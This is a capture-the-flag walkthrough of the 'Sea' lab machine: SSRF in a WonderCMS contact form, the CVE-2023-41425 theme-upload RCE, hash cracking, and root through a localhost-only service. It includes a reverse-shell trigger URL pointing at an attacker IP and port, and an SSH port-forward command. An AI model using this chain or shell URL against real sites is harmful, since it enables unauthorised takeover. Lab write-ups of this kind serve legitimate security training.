Sea
Overview
Sea is an easy Linux box running a PHP-based WonderCMS site. The contact
form makes server-side requests — an SSRF vector — that can be pointed at an
attacker-hosted payload. WonderCMS is vulnerable to CVE-2023-41425, an
authenticated XSS-to-RCE chain; the SSRF bypasses the authentication
requirement, delivering the malicious theme and executing a reverse shell as
www-data. A credential hash discovered in the CMS database cracks and reuses
to a system user account. That user has access to an internal monitoring
application running only on localhost, forwarded via SSH and found to be
exploitable for root.
Path: WonderCMS SSRF → CVE-2023-41425 RCE → www-data → CMS hash
→ user pivot → internal service → root.
Enumeration
The scan shows SSH on 22 and a web server on 80. The site is PHP-backed.

Browsing the site reveals a mostly static page with a contact form as the key interactive surface:

Testing the contact form shows it makes outbound server-side requests — an SSRF primitive. Submitting a URL pointing to a local listener gets a callback:


Probing the application further turns up a /loginURL redirect and a login
endpoint:


The theme and page structure identify the CMS as WonderCMS by turboblack.

Foothold — CVE-2023-41425 via SSRF
WonderCMS is vulnerable to CVE-2023-41425 — an authenticated theme-upload XSS that achieves RCE by installing a malicious ZIP as a theme. The exploit script from prodigiousMind/CVE-2023-41425 automates the payload. Ordinarily this requires a logged-in admin session, but the contact form SSRF means the server itself — already authenticated as admin — will fetch and trigger the payload:
I generated the exploit payload and hosted it, then submitted the exploit URL into the contact form’s URL field, letting the server-side request deliver it:

The server fetches the payload, installs the malicious theme, and executes it:

With a shell as www-data, the installed theme’s reverse-shell handler is
accessible directly:
http://sea.htb/themes/revshell-main/rev.php?lhost=10.10.14.41&lport=443

User
Enumerating the filesystem from the www-data shell turns up a database file
containing a password hash:


Checking /home reveals the system users:

Cracking the hash offline returns a plaintext password that reuses to one of the system accounts, giving SSH access and the user flag:


Privilege Escalation — Internal Service
From the user session, ss -tlnp or a process listing reveals an internal
web service bound only to localhost:8000:

Forwarding the port locally over SSH to examine it:
$ ssh -L 8000:localhost:8000 <user>@sea.htb

The forwarded service presents a monitoring or analytics web interface:

After analysis, the service is found to be running as root and accepts input that can be abused for command execution:

Root
Exploiting the internal service’s vulnerability yields code execution as root:

Takeaways
- SSRF can substitute for authentication. When the vulnerable server fetches URLs on behalf of the requester, it carries its own session cookies — turning a “requires login” exploit into an unauthenticated one.
- CVE-2023-41425 is a theme-upload RCE in WonderCMS that is trivially weaponized; any internet-exposed WonderCMS admin panel (or SSRF path to one) should be treated as a full compromise vector.